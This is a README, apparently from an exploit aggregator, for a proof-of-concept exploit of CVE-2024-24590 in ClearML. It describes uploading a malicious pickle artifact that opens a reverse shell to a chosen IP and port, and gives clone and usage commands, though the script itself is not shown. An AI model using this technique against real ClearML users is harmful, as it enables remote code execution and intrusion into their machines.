Share
## https://sploitus.com/exploit?id=FCB79465-1767-5AE8-A21E-6C8FE89E0F66
```
_____ _ __ __ _ _____ ____ _____
/ ____| | | \/ | | | __ \ / __ \ / ____|
| | | | ___ __ _ _ __| \ / | | | |__) | | | | |
| | | |/ _ \/ _` | '__| |\/| | | | ___/| | | | |
| |____| | __/ (_| | | | | | | |____ | | | |__| | |____
\_____|_|\___|\__,_|_| |_| |_|______| |_| \____/ \_____| - 2024-24590 x OxyDe
```
# ClearML Pickle Artifact Upload PoC
This project demonstrates how to dynamically upload a pickle artifact to ClearML with configurable parameters via command line arguments.
The script initializes a ClearML task, dynamically configures a command for reverse shell execution, and uploads it as an artifact. (PoC-CVE-2024-24590)
Referer : https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
## Prerequisites
- Python 3.6+
- `clearml` package
- `argparse` package
- `pickle` package
- `os` module
## Installation
1. Install ClearML package:
```bash
pip install clearml
```
2. Clone the repository:
```bash
git clone https://github.com/OxyDeV2/PoC-CVE-2024-24590.git
cd PoC-CVE-2024-24590
```
## Usage
To run the script, use the following command with the appropriate arguments:
```bash
python script.py --project_name "<project_name>" --task_name "<task_name>" --tags <tag1> <tag2> ... --artifact_name "<artifact_name>" --ip "<ip_address>" --port "<port>"
```
Thanks to Skriix :)